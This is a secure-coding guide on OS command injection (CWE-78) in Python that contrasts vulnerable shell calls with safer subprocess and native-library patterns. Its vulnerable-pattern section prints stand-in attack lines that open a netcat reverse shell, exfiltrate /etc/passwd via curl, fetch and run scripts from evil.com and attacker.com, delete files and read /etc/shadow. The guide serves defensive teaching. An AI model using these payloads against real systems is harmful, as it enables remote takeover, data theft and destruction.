CWE-78: OS Command Injection - Python
Overview
OS Command Injection occurs when an application incorporates untrusted data into an operating system command without proper validation or sanitization. Attackers can execute arbitrary commands on the host operating system.
Primary Defense: Use Python native libraries (pathlib, requests, etc.) instead of system commands. If a system command is unavoidable, use subprocess.run() with an argument list and shell=False (never shell=True).
Remediation Strategy
PRIMARY FIX - Avoid System Calls
Use Python native libraries instead of executing commands
- This eliminates the vulnerability entirely
- Do NOT use subprocess or os.system() if a Python library exists
SECONDARY FIX - Use subprocess.run() with Argument List
Set shell=False, pass arguments as list
- WARNING: Only use if Priority 1 is not possible
- Must use a list of arguments with shell=False (CRITICAL)
Defense in Depth - Input Validation
Allowlist permitted characters
- Required in addition to Priority 1 or 2
- Never use validation alone
Additional Hardening - Least Privilege
Drop privileges, use resource limits
- Apply alongside other fixes
Decision Tree
Need to execute OS command?
├─ Is there a Python library alternative? (pathlib, requests, etc.)
│ ├─ YES → Use Python library (Priority 1) - PREFERRED SOLUTION
│ └─ NO → Continue
│
├─ Can you use subprocess.run() with argument list?
│ ├─ YES → Use subprocess.run(['cmd', 'arg1', 'arg2'], shell=False) (Priority 2)
│ └─ NO → Re-evaluate if command is truly necessary
│
└─ For ALL solutions:
├─ Add input validation (Priority 3)
└─ Apply least privilege (Priority 4)
Common Vulnerable Patterns
String Concatenation with os.system()
# VULNERABLE - Command injection via string concatenation
filename = request.GET['file']
os.system('ls -la ' + filename)
# Attack example:
# Input: "file.txt; rm -rf /tmp/*"
# Result: Deletes all files in /tmp
Why this is vulnerable: os.system() executes commands through the shell, allowing attackers to inject shell metacharacters like ;, |, &&, or $() to chain commands such as ; rm -rf / or | nc attacker.com 4444 -e /bin/sh, achieving arbitrary code execution.
Using subprocess with shell=True
# VULNERABLE - Shell command injection
user_input = request.GET['path']
subprocess.run(f'cat {user_input}', shell=True)
# Attack example:
# Input: "file.txt | curl attacker.com?data=$(cat /etc/passwd)"
# Result: Exfiltrates password file
subprocess.Popen with Shell Invocation
# VULNERABLE - Invoking shell allows command injection
ip = request.GET['ip']
subprocess.Popen(f'ping -c 4 {ip}', shell=True)
# Attack example:
# Input: "8.8.8.8 && cat /etc/shadow > /tmp/pwned"
# Result: Executes additional commands
Why this is vulnerable: subprocess.Popen with shell=True passes the command to the shell, allowing injection of shell operators like &&, ||, or ; to execute arbitrary commands such as && wget http://evil.com/backdoor.sh -O- | sh, creating backdoors or stealing data.
Unvalidated Input in subprocess.call()
# VULNERABLE - No input validation with shell=True
user_file = request.POST['filepath']
subprocess.call('grep pattern ' + user_file, shell=True)
# Attack example:
# Input: "data.txt; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh"
# Result: Downloads and executes malware
Why this is vulnerable: subprocess.call() with shell=True and no validation allows attackers to inject shell metacharacters like ; to chain commands, download malicious scripts with wget or curl, and execute them, compromising the entire system.
Secure Patterns
Use Python Native Libraries (PREFERRED - Eliminates Command Injection)
# SECURE - Use pathlib and os modules instead of OS commands
from pathlib import Path
import os
directory = Path('/uploads')
for file_path in directory.iterdir():
    stat = file_path.stat()
    print(f"{file_path.name} {stat.st_size} {stat.st_mtime}")
# More file operations
import shutil
content = Path(filepath).read_text() # Instead of "cat"
shutil.copy(source, dest) # Instead of "cp"
Path(path).mkdir(parents=True, exist_ok=True) # Instead of "mkdir -p"
Path(filepath).unlink() # Instead of "rm"
Why this works: Python's pathlib and shutil modules operate directly on the filesystem through the Python runtime without invoking shell commands. This completely eliminates command injection vulnerabilities - there's no OS process to execute, no shell to interpret metacharacters like ;, |, or &&, and no possibility of command chaining. These functions are also more portable across operating systems than system commands.
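As a minimal sketch of replacing an `ls -la` call with pathlib, the helper below collects the name, size, and modification time of each directory entry. The function name `list_directory` and the tuple layout are illustrative assumptions, not part of any library.

```python
from pathlib import Path


def list_directory(directory):
    """Return (name, size_bytes, mtime) for each entry, sorted by name.

    Hypothetical helper that stands in for shelling out to `ls -la`.
    """
    entries = []
    for entry in Path(directory).iterdir():
        info = entry.stat()
        entries.append((entry.name, info.st_size, info.st_mtime))
    return sorted(entries)
```

A file whose name contains shell metacharacters (for example `b; rm -rf x`) is just another entry here, because the name is never handed to a shell.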
Use requests Library for Network Operations
# SECURE - Use requests instead of wget/curl commands
import requests
response = requests.get(url, timeout=30)
content = response.content
# For downloads
with requests.get(url, stream=True, timeout=30) as r:
    r.raise_for_status()
    with open('download.file', 'wb') as f:
        for chunk in r.iter_content(chunk_size=8192):
            f.write(chunk)
Why this works: The requests library performs network operations through pure Python code without executing wget, curl, or other command-line utilities. By eliminating process execution entirely, there's no attack surface for command injection - malicious URLs or parameters cannot escape into shell commands because no shell is ever invoked. The timeout parameter also prevents denial of service through hanging connections.
Use tarfile/zipfile for Archives
# SECURE - Use tarfile module instead of tar commands
import tarfile
from pathlib import Path
with tarfile.open(archive, 'r:gz') as tar:
    # Safe extraction with path validation
    for member in tar.getmembers():
        # Prevent path traversal
        if member.name.startswith('/') or '..' in member.name:
            raise ValueError(f'Unsafe archive member: {member.name}')
        tar.extract(member, path='./extracted')
# For ZIP files
import zipfile
with zipfile.ZipFile(archive, 'r') as zip_ref:
    for member in zip_ref.namelist():
        if member.startswith('/') or '..' in member:
            raise ValueError(f'Unsafe archive member: {member}')
    zip_ref.extractall('./extracted')
Why this works: Python's tarfile and zipfile modules handle archive operations in pure Python without calling external tar, unzip, or 7z commands. Even if an attacker controls filenames within the archive, they cannot inject shell commands because no shell is invoked. The path traversal validation (checking for .. and absolute paths) prevents zip slip attacks, providing defense-in-depth.
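A name-based check does not cover symbolic links or device entries inside a tar archive. The sketch below is one stricter variant, assuming a hypothetical helper named `safe_extract_tar`: it compares resolved paths against the destination, rejects anything that is not a regular file or directory, and passes the `data` extraction filter when the running Python version provides it.

```python
import os
import tarfile


def safe_extract_tar(archive_path, dest_dir):
    """Extract a tar archive, rejecting members that would land outside dest_dir.

    Hypothetical helper; links and special files are refused outright.
    """
    dest_root = os.path.realpath(dest_dir)
    with tarfile.open(archive_path, 'r:*') as tar:
        members = tar.getmembers()
        for member in members:
            target = os.path.realpath(os.path.join(dest_root, member.name))
            if os.path.commonpath([dest_root, target]) != dest_root:
                raise ValueError(f'Unsafe archive member: {member.name}')
            if not (member.isfile() or member.isdir()):
                raise ValueError(f'Unsupported member type: {member.name}')
        # Use the built-in "data" filter where this Python version has it
        extra = {'filter': 'data'} if hasattr(tarfile, 'data_filter') else {}
        # Every member was vetted above, so extract them in one pass
        tar.extractall(dest_root, members=members, **extra)
```

All members are validated before anything is written, so a malicious entry late in the archive cannot leave a half-extracted tree behind.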
Use re Module for Text Processing
# SECURE - Use re module instead of grep commands
import re
from pathlib import Path
content = Path(filepath).read_text()
matches = re.findall(pattern, content)
# Line-by-line processing
with open(filepath) as f:
    matching_lines = [line for line in f if search_term in line]
Why this works: Python's re module and file I/O operations provide powerful text processing capabilities without executing grep, sed, awk, or other shell utilities. Processing text in-memory through Python prevents command injection while offering better performance, type safety, and cross-platform compatibility. List comprehensions and regex operations are also more maintainable than complex shell pipelines.
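A small grep-like helper might look like the following. The name `grep_lines` is an assumption for illustration; if the search text comes from a user and should be matched literally, wrapping it in `re.escape()` keeps regex metacharacters from changing the pattern.

```python
import re
from pathlib import Path


def grep_lines(filepath, pattern):
    """Return the lines of filepath that match the regex pattern.

    Hypothetical helper that stands in for `grep -E pattern file`.
    """
    compiled = re.compile(pattern)
    with Path(filepath).open(encoding='utf-8') as handle:
        return [line.rstrip('\n') for line in handle if compiled.search(line)]
```

Usage: `grep_lines('app.log', r'^error')` for a regex search, or `grep_lines('app.log', re.escape(user_text))` for a literal one.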
subprocess.run() with Argument List (If Process Execution Required)
WARNING: Avoid executing OS commands if at all possible. Python has native libraries for almost everything (requests, pathlib, zipfile, etc.). This pattern is ONLY for cases where no Python library exists (e.g., calling a legacy third-party binary). Always exhaust all native alternatives first.
# USE WITH CAUTION - When process execution is unavoidable, use argument list
import subprocess
import re
ip_address = request.GET['ip']
# Validate input first
if not re.match(r'^(\d{1,3}\.){3}\d{1,3}$', ip_address):
    raise ValueError('Invalid IP address')
# Use list of arguments - NO SHELL
result = subprocess.run(
    ['ping', '-c', '4', ip_address],  # Arguments as list
    capture_output=True,
    text=True,
    shell=False,  # CRITICAL: shell=False
    timeout=10
)
print(result.stdout)
Why this works: Using subprocess.run() with arguments as a list and shell=False passes each argument directly to the executable without shell interpretation. Even if ip_address contains shell metacharacters like ; or &&, they're treated as literal argument data rather than command separators. The shell=False setting is critical - it prevents Python from invoking /bin/sh or cmd.exe, eliminating the shell layer entirely. Input validation provides defense-in-depth by rejecting malformed inputs before they reach subprocess.
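To see the literal-argument behavior without touching the network, the sketch below launches a child Python interpreter that prints its first argument. The helper name `echo_argument` is hypothetical, and the child process stands in for whichever binary has to be called.

```python
import subprocess
import sys


def echo_argument(value):
    """Run a child Python process that prints its first argument back."""
    result = subprocess.run(
        [sys.executable, '-c', 'import sys; print(sys.argv[1])', value],
        capture_output=True,
        text=True,
        shell=False,  # No shell, so metacharacters are never interpreted
        timeout=10,
        check=True,
    )
    return result.stdout.rstrip('\n')
```

Calling `echo_argument('8.8.8.8; echo INJECTED && id')` returns the whole string unchanged: the child receives it as one argument and no second command runs.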
subprocess.run() with Path Validation (For File Operations)
WARNING: Use Python's pathlib, shutil, or os modules instead of subprocess for file operations. Only use subprocess for operations with no Python equivalent (e.g., calling external compression tools).
For file operations requiring subprocess - always validate paths.
# AVOID IF POSSIBLE - Validate paths before use
import re
from pathlib import Path
filename = request.GET['file']
# Validate filename
if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
    raise ValueError('Invalid filename')
# Better: Use pathlib instead of subprocess
file_path = Path('/uploads') / filename
# Path.is_relative_to() requires Python 3.9+
if not file_path.resolve().is_relative_to('/uploads'):
    raise ValueError('Path traversal detected')
content = file_path.read_text()
Why this works: Using Path.resolve() and is_relative_to() ensures the resolved absolute path stays within the intended directory, preventing path traversal attacks through ../ sequences. The regex validation creates an allowlist of permitted filename characters, blocking shell metacharacters. However, the example emphasizes using pathlib's native file operations (read_text()) instead of subprocess entirely - this is the most secure approach because it avoids process execution altogether.
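The two checks can be packaged into one reusable function. This is a sketch under stated assumptions: `resolve_upload` and `FILENAME_PATTERN` are hypothetical names, and the base directory is passed in rather than hard-coded. Note that `..` consists only of allowlisted characters, so the character allowlist alone would accept it. The helper rejects `.` and `..` explicitly and keeps the containment check as a second barrier.

```python
import re
from pathlib import Path

FILENAME_PATTERN = re.compile(r'[A-Za-z0-9._-]+')


def resolve_upload(base_dir, filename):
    """Return the resolved path of filename inside base_dir, or raise ValueError."""
    base = Path(base_dir).resolve()
    # Allowlist of characters; '.' and '..' pass the pattern, so reject them by name
    if not FILENAME_PATTERN.fullmatch(filename) or filename in ('.', '..'):
        raise ValueError('Invalid filename')
    candidate = (base / filename).resolve()
    # Containment check after resolving symlinks (is_relative_to needs Python 3.9+)
    if not candidate.is_relative_to(base):
        raise ValueError('Path traversal detected')
    return candidate
```

Usage: `content = resolve_upload('/uploads', filename).read_text()`.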
Input Validation (Defense in Depth)
Allowlist Validation
import re
def validate_filename(filename):
    """Only allow alphanumeric, underscore, dash, dot"""
    if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
        raise ValueError('Invalid filename characters')
    return filename
def validate_ip_address(ip):
    """Validate IPv4 format"""
    import ipaddress
    try:
        ipaddress.IPv4Address(ip)
        return ip
    except ValueError:
        raise ValueError('Invalid IP address')
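Two details of allowlist regexes are easy to miss. First, `$` in `re.match()` also matches just before a trailing newline, so `'name\n'` passes the pattern above. Second, a value beginning with `-` may be read as an option by the program that receives it. The stricter variant below is a sketch, with `validate_filename_strict` and `SAFE_NAME` as hypothetical names. It uses `re.fullmatch()` and requires the first character to be alphanumeric or an underscore.

```python
import re

# First character must not be '-' or '.', the rest follows the same allowlist
SAFE_NAME = re.compile(r'[A-Za-z0-9_][A-Za-z0-9._-]*')


def validate_filename_strict(filename):
    """Allowlist check that must match the entire string."""
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError('Invalid filename characters')
    return filename
```

Rejecting a leading dot also rules out `..` and hidden files. Relax that part of the pattern if dotfiles are legitimate in the application.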
Django/Flask Integration
# Django view with validation
import subprocess
from django.core.validators import RegexValidator
from django.core.exceptions import ValidationError
from django.http import HttpResponse, HttpResponseBadRequest
ip_validator = RegexValidator(
    regex=r'^(\d{1,3}\.){3}\d{1,3}$',
    message='Invalid IP address'
)
def ping_view(request):
    ip_address = request.GET.get('ip', '')
    try:
        ip_validator(ip_address)
    except ValidationError:
        return HttpResponseBadRequest('Invalid IP')
    # Safe to use with subprocess
    result = subprocess.run(
        ['ping', '-c', '4', ip_address],
        capture_output=True,
        shell=False
    )
    return HttpResponse(result.stdout)
shlex for Argument Parsing (Use Carefully)
import shlex
import subprocess
# Only use shlex.split() for parsing TRUSTED input
# NOT for untrusted user input directly in commands
# Safe: parsing trusted command template
cmd_template = 'ping -c 4'
args = shlex.split(cmd_template)
args.append(validated_ip) # Append validated user input
subprocess.run(args, shell=False)
# NEVER do this:
# user_input = request.GET['cmd']
# args = shlex.split(user_input) # Still vulnerable!
# subprocess.run(args, shell=False)
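The difference is visible from the token lists alone, without running any process. In this sketch `build_ping_args` is a hypothetical helper and the `rm` string stands in for attacker-supplied text.

```python
import shlex


def build_ping_args(validated_ip):
    """Split a trusted template, then append the user value as ONE argument."""
    args = shlex.split('ping -c 4')
    args.append(validated_ip)
    return args


# Splitting untrusted text lets the sender pick the program and its options
attacker_args = shlex.split('rm -rf "/tmp/some dir"')
```

Here `attacker_args` is `['rm', '-rf', '/tmp/some dir']`: no shell is involved, yet the attacker still chose the executable. By contrast, `build_ping_args('8.8.8.8; id')` yields `['ping', '-c', '4', '8.8.8.8; id']`, where the appended value stays a single argument.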
Security Best Practices
Use Timeout
try:
    result = subprocess.run(
        ['ping', '-c', '4', ip_address],
        capture_output=True,
        shell=False,
        timeout=10  # Prevent hanging
    )
except subprocess.TimeoutExpired:
    # Handle timeout
    pass
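A wrapper can make the timeout outcome explicit to callers. This is a sketch: `run_with_timeout` is a hypothetical name, and returning `None` on timeout is one possible convention. `subprocess.run()` kills the child itself when the timeout expires, so no extra cleanup is needed here.

```python
import subprocess
import sys


def run_with_timeout(args, seconds):
    """Return the CompletedProcess, or None if the child exceeded the timeout."""
    try:
        return subprocess.run(
            args,
            capture_output=True,
            text=True,
            shell=False,
            timeout=seconds,
        )
    except subprocess.TimeoutExpired:
        # subprocess.run() has already killed and reaped the child at this point
        return None
```

Usage: `run_with_timeout([sys.executable, '-c', 'import time; time.sleep(30)'], 1)` returns `None` after roughly one second instead of blocking for thirty.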
Limit Resource Usage
import resource
import subprocess
def limit_process_resources():
    """Limit CPU and memory for subprocess"""
    def set_limits():
        # Limit CPU time to 30 seconds
        resource.setrlimit(resource.RLIMIT_CPU, (30, 30))
        # Limit memory to 128MB
        resource.setrlimit(resource.RLIMIT_AS, (128 * 1024 * 1024,
                                                128 * 1024 * 1024))
    return set_limits
# Use preexec_fn (Unix only)
subprocess.run(
    ['ping', '-c', '4', ip_address],
    preexec_fn=limit_process_resources(),
    shell=False
)
Drop Privileges (Unix)
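import os
import pwd
import subprocess
def drop_privileges(username='nobody'):
    """Drop privileges to specified user"""
    def set_user():
        pw_record = pwd.getpwnam(username)
        # Clear supplementary groups first; they are not reset by setgid/setuid
        os.setgroups([])
        # Set the group before the user: after setuid() the process can no longer change groups
        os.setgid(pw_record.pw_gid)
        os.setuid(pw_record.pw_uid)
    return set_user
# Run subprocess as unprivileged user
subprocess.run(
    ['command'],
    preexec_fn=drop_privileges('nobody'),
    shell=False
)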
Verification
After implementing the recommended secure patterns, verify the fix through multiple approaches:
- Manual testing: Submit malicious payloads relevant to this vulnerability and confirm they're handled safely without executing unintended operations
- Code review: Confirm all instances use the secure pattern (native Python libraries, or subprocess with an argument list and shell=False) with no string concatenation into command strings and no shell=True
- Static analysis: Use security scanners to verify no new vulnerabilities exist and the original finding is resolved
- Regression testing: Ensure legitimate user inputs and application workflows continue to function correctly
- Edge case validation: Test with special characters, boundary conditions, and unusual inputs to verify proper handling
- Framework verification: If using a framework or library, confirm the recommended APIs are used correctly according to documentation
- Authentication/session testing: Verify security controls remain effective and cannot be bypassed (if applicable to the vulnerability type)
- Rescan: Run the security scanner again to confirm the finding is resolved and no new issues were introduced
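The manual and edge-case checks above can be partly automated by running known injection payloads through the validator and confirming that none are accepted. The payload list and the helper names `is_valid_ipv4` and `accepted_payloads` are illustrative assumptions. A real test suite would extend the list for the application's own inputs.

```python
import ipaddress

# Sample payloads modeled on the attack examples in this guide (not exhaustive)
INJECTION_PAYLOADS = [
    '8.8.8.8; rm -rf /tmp/*',
    '8.8.8.8 && cat /etc/shadow',
    '8.8.8.8 | nc attacker.com 4444',
    '$(id)',
    '`id`',
    '8.8.8.8\n',
    '-c 1000 8.8.8.8',
]


def is_valid_ipv4(value):
    """Return True only for a well-formed IPv4 address."""
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return False


def accepted_payloads(validator, payloads):
    """Return the payloads the validator wrongly accepts (should be empty)."""
    return [payload for payload in payloads if validator(payload)]
```

A regression test can then assert that `accepted_payloads(is_valid_ipv4, INJECTION_PAYLOADS)` is empty while `is_valid_ipv4('8.8.8.8')` remains true.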
Deprecated/Dangerous Functions to Avoid
# NEVER USE THESE:
os.system(cmd) # Always uses shell
os.popen(cmd) # Uses shell (implemented via subprocess with shell=True)
commands.getoutput(cmd) # Removed in Python 3; its successor subprocess.getoutput() also uses shell
subprocess.call(cmd, shell=True)
subprocess.Popen(cmd, shell=True)
# ALWAYS USE:
subprocess.run([...], shell=False)
subprocess.check_output([...], shell=False)
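For a quick first pass during code review, the standard-library `ast` module can flag the calls listed above. This is a rough sketch, not a substitute for a real security scanner: `find_shell_calls` is a hypothetical helper, and it only catches direct `os.system`/`os.popen` calls and a literal `shell=True` keyword, so aliased imports or a variable passed as `shell` go unnoticed.

```python
import ast

SHELL_FUNCTIONS = {('os', 'system'), ('os', 'popen')}


def find_shell_calls(source):
    """Return sorted (line, description) pairs for calls that go through a shell."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        # Direct calls such as os.system(...) or os.popen(...)
        if (isinstance(func, ast.Attribute)
                and isinstance(func.value, ast.Name)
                and (func.value.id, func.attr) in SHELL_FUNCTIONS):
            findings.append((node.lineno, f'{func.value.id}.{func.attr}'))
        # Any call that passes the literal keyword shell=True
        for keyword in node.keywords:
            if (keyword.arg == 'shell'
                    and isinstance(keyword.value, ast.Constant)
                    and keyword.value.value is True):
                findings.append((node.lineno, 'shell=True'))
    return sorted(findings)
```

Usage: `find_shell_calls(Path('views.py').read_text())` returns line numbers to inspect by hand. The file name is only an example.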